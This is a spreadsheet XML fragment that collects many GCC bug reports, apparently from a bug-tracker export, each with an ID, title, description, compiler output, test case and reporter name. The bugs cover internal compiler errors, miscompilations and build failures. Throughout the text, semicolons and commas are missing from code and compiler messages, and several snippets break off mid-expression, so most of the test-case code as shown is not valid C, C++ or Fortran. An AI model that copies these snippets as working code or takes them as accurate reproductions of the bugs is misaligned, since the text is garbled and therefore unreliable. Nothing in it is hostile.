/opt/gcc/darwin_buildw/./prev-gcc/xgcc -B/opt/gcc/darwin_buildw/./prev-gcc/ -B/opt/gcc/gcc4.4w/powerpc-apple-darwin9/bin/ -c   -g -O2 -mdynamic-no-pic -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros                                  -Wno-overlength-strings -Werror -fno-common   -DHAVE_CONFIG_H -I. -I. -I../../gcc-4.4-work/gcc -I../../gcc-4.4-work/gcc/. -I../../gcc-4.4-work/gcc/../include -I../../gcc-4.4-work/gcc/../libcpp/include -I/sw/include  -I../../gcc-4.4-work/gcc/../libdecnumber -I../../gcc-4.4-work/gcc/../libdecnumber/dpd -I../libdecnumber    ../../gcc-4.4-work/gcc/fold-const.c -o fold-const.o
cc1: warnings being treated as errors
../../gcc-4.4-work/gcc/fold-const.c: In function 'tree_single_nonnegative_warnv_p':
../../gcc-4.4-work/gcc/fold-const.c:14241: error: ISO C90 forbids mixed declarations and code
../../gcc-4.4-work/gcc/fold-const.c: In function 'tree_invalid_nonnegative_warnv_p':
../../gcc-4.4-work/gcc/fold-const.c:14282: error: ISO C90 forbids mixed declarations and code
make[3]: *** [fold-const.o] Error 1
make[2]: *** [all-stage2-gcc] Error 2
make[1]: *** [stage2-bubble] Error 2
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>GCC-7782</t>
  </si>
  <si>
    <t>[3.3 regression] C++ compiler internal error in delete_insn at cfgrtl.c:139</t>
  </si>
  <si>
    <t xml:space="preserve"> Given the compiler command:
   g++ -v -Wall -O -c source.cc
 The following internal error results:
    Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2/specs
    Configured with: ../gcc-3.2/configure 
    Thread model: posix
    gcc version 3.2
     /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2/cc1plus -v -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=0 -D__GXX_ABI_VERSION=102 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ source.cc -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -quiet -dumpbase source.cc -O -Wall -version -o /tmp/ccQCao7G.s
    GNU CPP version 3.2 (cpplib) (i386 Linux/ELF)
    GNU C++ version 3.2 (i686-pc-linux-gnu)
	    compiled by GNU C version 3.2.
    ignoring nonexistent directory NONE/include
    ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
    #include ... search starts here:
    #include  search starts here:
     /usr/local/qt/include
     /usr/local/include/c++/3.2
     /usr/local/include/c++/3.2/i686-pc-linux-gnu
     /usr/local/include/c++/3.2/backward
     /usr/local/include
     /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2/include
     /usr/include
    End of search list.
    source.cc: In member function `void Int128T::foo(int&amp;)':
    source.cc:67: Internal compiler error in delete_insn at cfgrtl.c:139
    Please submit a full bug report
    with preprocessed source if appropriate.
    See  for instructions.
Release:
3.2
Environment:
System: Linux homer 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.2/configure
How-To-Repeat:
typedef long long Int64T
typedef unsigned long long Uint64T
class Int128T
{
protected:
   Uint64T dataLeast
   Int64T dataMost
public:
   Int128T ()
   {
   }
   Int128T (const Int128T &amp;v)
   {
      dataMost = v.dataMost
      dataLeast = v.dataLeast
   }
   Int128T &amp;operator = (const Int128T &amp;v)
   {
      dataMost = v.dataMost
      dataLeast = v.dataLeast
      return *this
   }
   int sign () const
   {
      if (dataMost == 0)
	 return (dataLeast == 0) ? 0 : 1
      return (dataMost &lt; 0) ? -1 : 1
   }
   Int128T operator - () const
   {
      Int128T res
      res.dataMost = ~dataMost
      if ((res.dataLeast = -dataLeast) == 0)
	 res.dataMost++
      return res
   }
   void foo (int 
}
void Int128T::foo (int &amp;rem)
{
   int ss = sign ()
   Int128T x
   if (ss &lt; 0)
      x = -*this
   Int128T q
   if (ss &lt; 0)
      *this = -q
   *this = q
}</t>
  </si>
  <si>
    <t>jvd</t>
  </si>
  <si>
    <t>GCC-7694</t>
  </si>
  <si>
    <t>g++ gives ICE 65 when compiling legal (I think) templated code</t>
  </si>
  <si>
    <t>command line: g++ -save-temps -c buggen.cpp
produced following error output: (cut-and-paste)
buggen.cpp: In constructor `MultbyConst::MultbyConst(const T&amp;)':
buggen.cpp:5: Internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc 3.0.3
Environment:
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with:  ../gcc-3.0.3/configure --program-suffix=-3
How-To-Repeat:
preprocessed source code included as file buggen.ii</t>
  </si>
  <si>
    <t>dtmoore</t>
  </si>
  <si>
    <t>GCC-24938</t>
  </si>
  <si>
    <t>gcj -C miscompiles gnu/CORBA/DynAn/gnuDynValue.java</t>
  </si>
  <si>
    <t>There are two pieces of code in gnuDynValue that generate unverifiable (and wrong!) code.
The following method in this file:
  public int component_count()
  {
    return isNull ? 0 : super.component_count()
  }
Generates the following byte code:
Method name:component_count public Signature: ()int
Attribute Code length:38 max_stack:2 max_locals:1 code_length:14
  0: aload_0
  1: getfield 
  4: ifeq 9
  7: iconst_0
  8: ireturn
  9: aload_0
 10: invokespecial 
 13: ireturn
Attribute LineNumberTable length:6 count: 1
  line: 369 at pc: 0
PC 10 is wrong. And the verifier actually catches that:
gnu/CORBA/DynAn/gnuDynValue.java: In class 'gnu.CORBA.DynAn.gnuDynValue':
gnu/CORBA/DynAn/gnuDynValue.java: In method 'gnu.CORBA.DynAn.gnuDynValue.component_count()':
gnu/CORBA/DynAn/gnuDynValue.java:369: error: verification failed at PC=10: didn't see expected constant
Another method in this file that exhibits this is:
  public boolean equal(DynAny other)
  {
    if (other instanceof DynValueOperations)
      {
        DynValueCommon o = (DynValueCommon) other
        if (isNull)
          return o.is_null() 
        else
          return !o.is_null() 
      }
    else
      return false
  }
That last super.equal() call generates the same wrong code.
This might be an existing bug but I couldn't quickly find it.
I have a workaround for this issue that I want to get in before reducing this.</t>
  </si>
  <si>
    <t>GCC-12319</t>
  </si>
  <si>
    <t>Wrong DW_AT_low_pc and DW_AT_high_pc for DW_TAG_inlined_subroutine</t>
  </si>
  <si>
    <t>Consider the following code snippet:
# cat troep.c
extern int a
inline void g()
{
  a = a + 1     // line 5
}
void f()
{
  g()
}                // line 11
Compiled as
# gcc-cvs-3.4 -g -O3 -c troep.c
Then the DWARF2 .debug_info section contains
wrong information:
# readelf --debug-dump troep.o
[...]
 : Abbrev Number: 7 (DW_TAG_inlined_subroutine)
     DW_AT_abstract_origin: 
     DW_AT_low_pc      : 0x10 16
     DW_AT_high_pc     : 0x1b 27
Where  refers to:
 : Abbrev Number: 2 (DW_TAG_subprogram)
     DW_AT_external    : 1
     DW_AT_name        : g
Note that function f() has:
 : Abbrev Number: 4 (DW_TAG_subprogram)
     DW_AT_sibling     : 
     DW_AT_external    : 1
     DW_AT_name        : f
Ie it is  and
 : Abbrev Number: 6 (DW_TAG_subprogram)
     DW_AT_sibling     : 
     DW_AT_abstract_origin: 
     DW_AT_low_pc      : 0x10 16
     DW_AT_high_pc     : 0x1b 27
In other words f() starts at offset 0x10 and
ends at 0x1b: its total size is 11 bytes.
That is correct.
What is wrong is that the inlined g() is said
to ALSO start at 0x10 and end at 0x1b.  This
is 100% nonsense.
troep.s:
.globl _Z1fv
        .type   _Z1fv@function
_Z1fv:
.LFB3:
        .file 1 troep.cc
        .loc 1 9 0
.LBB2:
.LBB3:
.LBB4:
        pushl   %ebp            &lt;-- Start of f() (offset 0x10)
.LCFI0:
        movl    %esp %ebp
.LCFI1:
        .loc 1 5 0              &lt;-- debug file/line number change (line 5)
        incl    a               &lt;-- Start of inlined g() (offset 0x13!)
        .loc 1 11 0             &lt;-- debug file/line number change (line 11)
        leave                   &lt;-- End of inlined g() (offset 0x19!)
        ret
                                &lt;-- End of f() (offset 0x1b)
See also disassembly:
# objdump -d troep.o
[...]
00000010 :
  10:   55                      push   %ebp
  11:   89 e5                   mov    %esp%ebp
  13:   ff 05 00 00 00 00       incl   0x0
  19:   5d                      pop    %ebp
  1a:   c3                      ret</t>
  </si>
  <si>
    <t>GCC-58843</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] ICE with broken destructor call</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.5.0:
========================================
struct A {}
template void foo(T t)
{
  t.T::~X()
}
void bar()
{
  foo(A())
}
========================================
bug.cc: In instantiation of 'void foo(T) [with T = A]':
bug.cc:10:10:   required from here
bug.cc:5:3: error: no type named 'X' in 'struct A'
   t.T::~X()
   ^
bug.cc:5:3: internal compiler error: Segmentation fault
0xa93d0f crash_signal
        ../../gcc-4.8.0/gcc/toplev.c:332
0x67f714 adjust_result_of_qualified_name_lookup(tree_node* tree_node* tree_node*)
        ../../gcc-4.8.0/gcc/cp/search.c:1531
0x657186 lookup_destructor
        ../../gcc-4.8.0/gcc/cp/typeck.c:2494
0x657186 finish_class_member_access_expr(tree_node* tree_node* bool int)
        ../../gcc-4.8.0/gcc/cp/typeck.c:2704
0x577e1b tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc-4.8.0/gcc/cp/pt.c:14260
0x577621 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc-4.8.0/gcc/cp/pt.c:13887
0x57f8ff tsubst_expr
        ../../gcc-4.8.0/gcc/cp/pt.c:13337
0x57fe5f tsubst_expr
        ../../gcc-4.8.0/gcc/cp/pt.c:12816
0x580174 tsubst_expr
        ../../gcc-4.8.0/gcc/cp/pt.c:12992
0x57dd4b instantiate_decl(tree_node* int bool)
        ../../gcc-4.8.0/gcc/cp/pt.c:18854
0x5b8466 instantiate_pending_templates(int)
        ../../gcc-4.8.0/gcc/cp/pt.c:18953
0x5f3d7d cp_write_global_declarations()
        ../../gcc-4.8.0/gcc/cp/decl2.c:4025
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-39172</t>
  </si>
  <si>
    <t>libada parsing of multilib options</t>
  </si>
  <si>
    <t>The magic that groks the multilib set in libada is unable to process the
one for the m68k.  Maybe someone who is configure/awk proficient can spot
the issue.  This works on other targets.
	make -C ../.././gcc/ada MAKEOVERRIDES= LDFLAGS= LN_S=ln -s SHELL=/bin/sh GNATLIBFLAGS=-W -Wall -gnatpg  GNATLIBCFLAGS=-g -O2  TARGET_LIBGCC2_CFLAGS= THREAD_KIND=native TRACE=no MULTISUBDIR= libsubdir=/home/joel/test-gcc/install/lib/gcc/m68k-rtems4.10/4.4.0 objext=.o prefix=/home/joel/test-gcc/install exeext=.exeext.should.not.be.used  'CC=the.host.compiler.should.not.be.needed' GCC_FOR_TARGET=/home/joel/test-gcc/b-gcc2-m68k/./gcc/xgcc -B/home/joel/test-gcc/b-gcc2-m68k/./gcc/ -nostdinc -B/home/joel/test-gcc/b-gcc2-m68k/m68k-rtems4.10/newlib/ -isystem /home/joel/test-gcc/b-gcc2-m68k/m68k-rtems4.10/newlib/targ-include -isystem /home/joel/test-gcc/gcc-svn/newlib/libc/include -B/home/joel/test-gcc/install/m68k-rtems4.10/bin/ -B/home/joel/test-gcc/install/m68k-rtems4.10/lib/ -isystem /home/joel/test-gcc/install/m68k-rtems4.10/include -isystem /home/joel/test-gcc/install/m68k-rtems4.10/sys-include CFLAGS=-B/home/joel/test-gcc/bsp-install/m68k-rtems4.10/mcf5206elite/lib/   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes gnatlib \
	&amp;&amp; touch stamp-libada
make[3]: BEGIN { FS=[ \t]*[()][ \t]* ORS=  } /^M68K_DEVICE/ { CPU=$3 FLAGS=$8 CPU_NAME=substr($22length($2)-2) MLIB=substr($52length($5)-2) if ( (CPU_NAME == MLIB) &amp;&amp; (match(MLIB ^68) || MLIB == cpu32 || MLIB == 5206 || MLIB == 5208 || MLIB == 5307 || MLIB == 5407 || MLIB == 5475)) print  mMLIB }: Command not found
make[3]: Entering directory `/home/joel/test-gcc/b-gcc2-m68k/gcc/ada'
make[3]: BEGIN { FS=[ \t]*[()][ \t]* ORS=  } /^M68K_DEVICE/ { CPU=$3 FLAGS=$8 CPU_NAME=substr($22length($2)-2) MLIB=substr($52length($5)-2) if ( CPU == ) print  MLIB }: Command not found</t>
  </si>
  <si>
    <t>GCC-47548</t>
  </si>
  <si>
    <t>[regression] m32c-rtems ICEt in change_address_1 at emit-rtl.c:1933</t>
  </si>
  <si>
    <t>Created attachment 23171
Preprocess file from RTEMS tripping bug.
$ m32c-rtems4.11-gcc -g -O2 -c testcase.c 
/users/joel/test-gcc/rtems/cpukit/libblock/src/bdbuf.c: In function 'rtems_bdbuf_wait':
/users/joel/test-gcc/rtems/cpukit/libblock/src/bdbuf.c:1002:1: internal compiler error: in change_address_1 at emit-rtl.c:1933
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Works at -O1 and fails at -Os.</t>
  </si>
  <si>
    <t>GCC-10673</t>
  </si>
  <si>
    <t>[3.3] ICE for x86-64 on freebsd libc vfprintf.c source</t>
  </si>
  <si>
    <t>gcc ICE's on src/lib/libc/stdio/vfprintf.c in the FreeBSD source tree.  vp.c is a preprocessed copy of the file:
hammer# gcc -c vp.c
hammer# gcc -c -O vp.c
vp.c: In function `__vfprintf':
vp.c:2904: internal compiler error: in change_address_1 at emit-rtl.c:2017
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc version 3.3 20030505 (prerelease)
Environment:
Target is FreeBSD/amd64 bug appears both when cross compiling and when natively hosted.  Native compiler passes 'make bootstrap' tests.
How-To-Repeat:
Compile as above with -O or higher.</t>
  </si>
  <si>
    <t>GCC-662</t>
  </si>
  <si>
    <t>bootstrap failure in cp/decl.c</t>
  </si>
  <si>
    <t>Bootstrap fails with:
../stage1/xgcc -B../stage1/ -B/export/u10/egcs-test/alphaev6-unknown-linux-gnu/bin/ -c  -DIN_GCC    -O2 -g -O2 -W -Wall  -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes  -Wno-long-long  -W -Wall    -I. -I.. -I../../../gcc/cp -I../../../gcc/cp/.. -I../../../gcc/cp/../config -I../../../gcc/cp/../../include ../../../gcc/cp/decl.c
../../../gcc/cp/decl.c: In function `revert_static_member_fn':
../../../gcc/cp/decl.c:14615: Internal error: Segmentation fault.
   Please submit a full bug report.
   See  for instructions.
Release:
today's CVS
Environment:
alphaev6-unknown-linux-gnu configured with
--enable-checking=no</t>
  </si>
  <si>
    <t>lucier</t>
  </si>
  <si>
    <t>GCC-17066</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE in do_jump at dojump.c:275</t>
  </si>
  <si>
    <t>Compiling the following with any level of optimization...
void foo(char *ptr double d double div)
{
  while (d &gt;= div 
}
results in...
bug.i: In function `foo':
bug.i:2: internal compiler error: in do_jump at dojump.c:275
I believe this is a new regression (within 24hrs or so)</t>
  </si>
  <si>
    <t>GCC-36397</t>
  </si>
  <si>
    <t>libmudflap</t>
  </si>
  <si>
    <t>[4.4 regression] ICE with pointer cast and -fmudflap</t>
  </si>
  <si>
    <t>The following valid testcase triggers an ICE on mainline when compiled with
-fmudflap -O:
=================================
struct A
{
  int i j
}
int foo(long long int x)
{
  return ((struct A*)
}
=================================
bug.c: In function 'foo':
bug.c:7: internal compiler error: in mf_xform_derefs_1 at tree-mudflap.c:789
Please submit a full bug report [etc.]
The regression was introduced between 2008-05-03 and 2008-05-13.</t>
  </si>
  <si>
    <t>GCC-4114</t>
  </si>
  <si>
    <t>building gcc-3.0.1 - gthr.h and others missing</t>
  </si>
  <si>
    <t>On both systems I got errors from make that some files were missing.
The path given in Linux was 
/buildroot/gcc-3.0.1/i686-pc-linux-gnu/libstdc++-v3/../gcc/
Slackware wanted gthr.h and gthr-single.h
Solaris wanted gthr.h and some others. (gthr-posix.h and gthr-solaris.h?)
Release:
gcc-3.0.1
Environment:
Slackware 8.0 and Solaris Sparc 2.6
How-To-Repeat:
extract clean source tree from gcc-3.0.1.tar.bz2
./configure --enable-shared
make</t>
  </si>
  <si>
    <t>ajhood</t>
  </si>
  <si>
    <t>GCC-1679</t>
  </si>
  <si>
    <t>c++ -v -save-temps -DHAVE_CONFIG_H -I. -I. -I. -I./.. -isystem /usr/local/X11/include -DNDEBUG -O2 -g -W -Wall -trigraphs  -c HelpCB.C</t>
  </si>
  <si>
    <t>HelpCB.C: In function `void PopupTip(void * XtIntervalId *)':
HelpCB.C:2166: Internal compiler error in `scan_region' at except.c:2566
Please submit a full bug report.
Release:
2.95.2 19991024
Environment:
alpha-dec-osf4.0e</t>
  </si>
  <si>
    <t>zac</t>
  </si>
  <si>
    <t>GCC-33986</t>
  </si>
  <si>
    <t>ICE on allocatable function result</t>
  </si>
  <si>
    <t>An internal compiler results from assigning an integer constant to an integer variable in Fortran on Mac OS X.  The problem occurs inside a wrapper for a FFT procedure. I've read the instructions but I don't see how to attach the code to this submission.</t>
  </si>
  <si>
    <t>damian</t>
  </si>
  <si>
    <t>GCC-42439</t>
  </si>
  <si>
    <t>Linux kernel BUILD_BUG_ON() broke</t>
  </si>
  <si>
    <t>The linux kernel uses a special macro BUILD_BUG_ON() that uses
some tricks using bitfields to evaluate constant expressions at compile time
and error out if they are violated.
One of the BUILD_BUG_ON()s in a recent kernel now fail with gcc 4.5 snapshot
(gcc version 4.5.0 20091219 (experimental) (GCC))
when 4.4 and earlier work.
The actual expression is evaluated correctly (I replaced it with a different
form and that worked) 
I'll be submitting a workaround to the kernel but it might be some 
sort of regression.
I'm attaching the preprocessed file
% gcc44 fs/compat_ioctl.i -O2 -c           (as expected)
% gcc45 fs/compat_ioctl.i -O2 -c
linux-2.6.33-rc1-ak/fs/compat_ioctl.c: In function 'compat_ioctl_check_table':
linux-2.6.33-rc1-ak/fs/compat_ioctl.c:1653:24: error: bit-field '' width not an integer constant
(fails)</t>
  </si>
  <si>
    <t>GCC-1864</t>
  </si>
  <si>
    <t>V3 ABI bug</t>
  </si>
  <si>
    <t>When the program below is compiled and run it crashes:
$ g++ -g -o xidl xidl.cpp
$ ./xidl
Segmentation fault (core dumped)
$
Here's the stack trace where it crashes:
Program received signal SIGSEGV Segmentation fault.
0x8048bd2 in _ZN20CORBA_Container_implC2EPPKv (this=0x8050ec8 
    __vtt_parm=0x804a0d8) at xidl.cpp:16
16        new CORBA_Repository_impl()
(gdb) where
#0  0x8048bd2 in _ZN20CORBA_Container_implC2EPPKv (this=0x8050ec8 
    __vtt_parm=0x804a0d8) at xidl.cpp:16
#1  0x8048786 in _ZN21CORBA_Repository_implC1Ev (this=0x8050eb8) at xidl.cpp:16
#2  0x80486b1 in main () at xidl.cpp:16
#3  0x400edfd1 in __libc_start_main (main=0x8048690  argc=1 
    ubp_av=0xbfffd854 init=0x80484e8  fini=0x8049014  
    rtld_fini=0x4000e254  stack_end=0xbfffd84c)
    at ../sysdeps/generic/libc-start.c:118
Release:
2.97 20010129 (experimental)
Environment:
System: Linux karma 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../egcs/configure --prefix=/usr/local/egcs --enable-threads=posix
How-To-Repeat:
This one's even from a real program (the orbacus idl compiler)
rather than a contrived test case :).
-----------------------------------------------------
class OBRefCount
{
public:
  int ref_
  virtual ~OBRefCount() {}
}
class CORBA_Container_skel : virtual public OBRefCount {}
class CORBA_Container_impl : public virtual CORBA_Container_skel {}
class CORBA_Repository_impl : public virtual CORBA_Container_skel
			      public virtual CORBA_Container_impl {}
int main()
{
  new CORBA_Repository_impl()
  return 0
}
-----------------------------------------------------</t>
  </si>
  <si>
    <t>snyder</t>
  </si>
  <si>
    <t>GCC-16597</t>
  </si>
  <si>
    <t>libfortran</t>
  </si>
  <si>
    <t>gfortran: bug in unformatted I/O on scratch files</t>
  </si>
  <si>
    <t>Hi all
there's apparently a bug in the runtime when handling unformatted I/O on scratch
files.  It reads back garbage after writing.
Sample program:
      program gfbug4
      implicit none
      integer      strlen
      parameter    (strlen = 4)
      integer      iunit i k
      character    string *4
      do 10 i = 1 strlen
         string(i:i) = achar (i)
 10   continue
      iunit = 99
      open (UNIT=iunitFORM='unformatted'ACCESS='direct'RECL=strlen)
      write (iunit rec=1) string
      read (iunit rec=1) i
      close (iunit)
      print * i
      open (UNIT=iunitFORM='unformatted'ACCESS='direct'
     $      STATUS='scratch'RECL=strlen)
      write (iunit rec=1) string
      read (iunit rec=1) k
      close (iunit)
      print * k
      if (i .eq. k) then
         print * 'O.K.'
      else
         print * '*** Bug! ***'
      endif
      end
Result:
% ./a.out 
    67305985
   538976288
 *** Bug! ***
The first write to fort.99 and reading back works fine - it indicates that
I/O has little-endian form but the second is just 0x20202020.</t>
  </si>
  <si>
    <t>GCC-6844</t>
  </si>
  <si>
    <t>Seg fault when trying to preprocess a file with lots of #define's</t>
  </si>
  <si>
    <t>We are trying to preprocess a file with lots of #define's. At the end of the file the C preprocessor stumbles.
lot of : invalid preprocessing directive #define
then
gcc: Internal error: Segmentation fault (program cpp0)
Release:
gcc 3.1
Environment:
Linux Redhat 7.2 ( 2.4.9-32 ) kernel 
gcc compiled with orginal 7.2 gcc.</t>
  </si>
  <si>
    <t>marduk</t>
  </si>
  <si>
    <t>GCC-31231</t>
  </si>
  <si>
    <t>Problem while compiling gcc for xtensa-elf</t>
  </si>
  <si>
    <t>Hello
there seems to be a gcc problem with the target 'xtensa-elf':
/home/mstein/sim/xtensa-elf/build/./gcc/xgcc -B/home/mstein/sim/xtensa-elf/build/./gcc/ -nostdinc -B/home/mstein/sim/xtensa-elf/build/xtensa-elf/newlib/ -isystem /home/mstein/sim/xtensa-elf/build/xtensa-elf/newlib/targ-include -isystem /n/07/mstein/combined-trunk/newlib/libc/include -B/n/07/mstein/cross-local/xtensa-elf-new/xtensa-elf/bin/ -B/n/07/mstein/cross-local/xtensa-elf-new/xtensa-elf/lib/ -isystem /n/07/mstein/cross-local/xtensa-elf-new/xtensa-elf/include -isystem /n/07/mstein/cross-local/xtensa-elf-new/xtensa-elf/sys-include -L/home/mstein/sim/xtensa-elf/build/./ld -O2 -g -O2 -O2  -O2 -g -O2  -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -mlongcalls -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc  -I. -I. -I../.././gcc -I/n/07/mstein/combined-trunk/libgcc -I/n/07/mstein/combined-trunk/libgcc/. -I/n/07/mstein/combined-trunk/libgcc/../gcc -I/n/07/mstein/combined-trunk/libgcc/../include -I/n/07/mstein/combined-trunk/libgcc/../libdecnumber -I../../libdecnumber -o _muldi3.o -MT _muldi3.o -MD -MP -MF _muldi3.dep -DL_muldi3 -c /n/07/mstein/combined-trunk/libgcc/../gcc/libgcc2.c \
/n/07/mstein/combined-trunk/libgcc/../gcc/libgcc2.c: In function '__muldi3':
/n/07/mstein/combined-trunk/libgcc/../gcc/libgcc2.c:560: internal compiler error: tree check: expected class 'expression' have 'constant' (integer_cst) in xtensa_expand_builtin at config/xtensa/xtensa.c:2476
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [_muldi3.o] Error 1
make[2]: Leaving directory `/home/mstein/sim/xtensa-elf/build/xtensa-elf/libgcc'
The SVN revision was 122962.</t>
  </si>
  <si>
    <t>GCC-341</t>
  </si>
  <si>
    <t>error compiling egcs on ia64</t>
  </si>
  <si>
    <t>I tried compiling the egcs source code on the IA64 architecure
and ran into the following problems. Could you please tell
me which version of the source code I need to download
so I can use it on an IA64 machine. thanks
./config/ia64/lib1funcs.asm: Assembler messages:
./config/ia64/lib1funcs.asm:604: Error: Unknown opcode `mov.ret.sptk rp=r33.L0'
make[2]: *** [libgcc/./__nonlocal_goto.o] Error 1
make[2]: Leaving directory `/home/users/athena913/gcc_obj/egcs-20000530/gcc'
make[1]: *** [libgcc.a] Error 2
make[1]: Leaving directory `/home/users/athena913/gcc_obj/egcs-20000530/gcc'
make: *** [all-gcc] Error 2
Release:
egcs-20000530
Environment:
linux  IA64</t>
  </si>
  <si>
    <t>krishnam</t>
  </si>
  <si>
    <t>GCC-55981</t>
  </si>
  <si>
    <t>std::atomic store is split in two smaller stores</t>
  </si>
  <si>
    <t>Created attachment 29166
miscompiled program
Hi
in the attached program std::atomic store is compiled as two 4-byte stores becoming not atomic at all. This happens at -O2 and higher.
To reproduce
# g++ -std=c++11 -O3 1.cc  -lpthread -o 1
# ./1
100000004
^ this can also be 300000002 both outcomes are invalid.</t>
  </si>
  <si>
    <t>GCC-32140</t>
  </si>
  <si>
    <t>[4.3 Regression] Miscompilation with -O1</t>
  </si>
  <si>
    <t>The following (reduced from CP2K PR 29975) generates wrong code with gfortran (gcc version 4.3.0 20070526)
MODULE TEST
CONTAINS
PURE FUNCTION s2a_3(s1s2s3) RESULT(a)
    CHARACTER(LEN=*) INTENT(IN)             :: s1 s2 s3
    CHARACTER(LEN=4) DIMENSION(3)        :: a
  a(1)=s1 a(2)=s2 a(3)=s3
END FUNCTION
END MODULE
USE TEST
write(6*) s2a_3(abbccc)
END
gfortran -O0 test.f90
&gt; ./a.out
 a   bb  ccc
&gt; gfortran -O2 test.f90
&gt; ./a.out
 abb  ccc
the latter case also shows:
==21268== Syscall param write(buf) points to uninitialised byte(s)
==21268==    at 0x4FF9CB0: __write_nocancel (in /lib64/libc-2.4.so)
==21268==    by 0x4BB8E10: do_write (unix.c:336)
==21268==    by 0x4BB8EB1: fd_flush (unix.c:386)
==21268==    by 0x4BB9AE7: fd_write (unix.c:761)
==21268==    by 0x4BB65E5: _gfortrani_next_record (transfer.c:2526)
==21268==    by 0x4BB69F5: finalize_transfer (transfer.c:2663)
==21268==    by 0x4BB6A38: _gfortran_st_write_done (transfer.c:2801)
==21268==    by 0x40090D: MAIN__ (in /users/vondele/g95/a.out)
==21268==    by 0x400AEB: main (fmain.c:22)
==21268==  Address 0x517A3CF is 151 bytes inside a block of size 8344 alloc'd
==21268==    at 0x4A20A56: malloc (vg_replace_malloc.c:149)
==21268==    by 0x4B39518: _gfortrani_get_mem (memory.c:53)
==21268==    by 0x4BB9879: fd_to_stream (unix.c:1043)
==21268==    by 0x4BB86BB: _gfortrani_init_units (unit.c:515)
==21268==    by 0x4B39267: init (main.c:152)
==21268==    by 0x4BC8B61: (within /data/vondele/gcc_trunk/build/lib64/libgfortran.so.3.0.0)
==21268==    by 0x4B35F8A: (within /data/vondele/gcc_trunk/build/lib64/libgfortran.so.3.0.0)</t>
  </si>
  <si>
    <t>Joost.VandeVondele</t>
  </si>
  <si>
    <t>GCC-49838</t>
  </si>
  <si>
    <t>[C++0x] ICE in cp_parser_perform_range_for_lookup at cp/parser.c:8796</t>
  </si>
  <si>
    <t>The g++ 4.7.0 20110723 (experimental) compile the ill-formed codes
when compiler say (normal) compiler error and ICE messages.
Codes here:
int main()
{
 auto a
 for(auto i: a)
}
Compiler messages:
$ g++4.7 -std=c++0x -Wall -Wextra -pedantic a.cpp
a.cpp: In function 'int main()':
a.cpp:3:7: error: declaration of 'auto a' has no initializer
a.cpp:4:14: error: unable to deduce 'auto&amp;&amp;' from 'a'
a.cpp:4:14: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in cp_parser_
perform_range_for_lookup at cp/parser.c:8796
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Version info:
$ g++4.7 -v
Built by Equation Solution .
Using built-in specs.
COLLECT_GCC=C:\cygwin\home\RiSK\misc\gcc4.7\bin\g++.exe
COLLECT_LTO_WRAPPER=c:/cygwin/home/risk/misc/gcc4.7/bin/../libexec/gcc/i686-pc-mingw32/4.7.0/lto-wrapper.exe
Target: i686-pc-mingw32
Configured with: ../gcc-4.7-20110723-mingw/configure --host=i686-pc-mingw32 --build=x86_64-unknown-linux-gnu --target
=i686-pc-mingw32 --prefix=/home/gfortran/gcc-home/binary/mingw32/native/x86_32/gcc/4.7-20110723 --with-gcc --with-gnu
-as --with-gnu-ld --with-host-libstdcxx='-lstdc++ -lsupc++ -lm' --with-ppl=/home/gfortran/gcc-home/binary/mingw32/nat
ive/x86_32/ppl --with-cloog=/home/gfortran/gcc-home/binary/mingw32/native/x86_32/cloog --with-gmp=/home/gfortran/gcc-
home/binary/mingw32/native/x86_32/gmp --with-mpfr=/home/gfortran/gcc-home/binary/mingw32/native/x86_32/mpfr --with-mp
c=/home/gfortran/gcc-home/binary/mingw32/native/x86_32/mpc --with-sysroot=/home/gfortran/gcc-home/binary/mingw32/cros
s/x86_32/gcc/4.7-20110723 --disable-shared --disable-nls --disable-tls --disable-win32-registry --enable-libquadmath-
support --enable-libquadmath --enable-languages=cc++fortran --enable-libgomp --enable-threads=win32 --enable-lto --
enable-static --enable-shared=lto-plugin --enable-plugins --enable-ld=yes --enable-cloog-backend=ppl
Thread model: win32
gcc version 4.7.0 20110723 (experimental) (GCC)</t>
  </si>
  <si>
    <t>sscrisk</t>
  </si>
  <si>
    <t>GCC-26885</t>
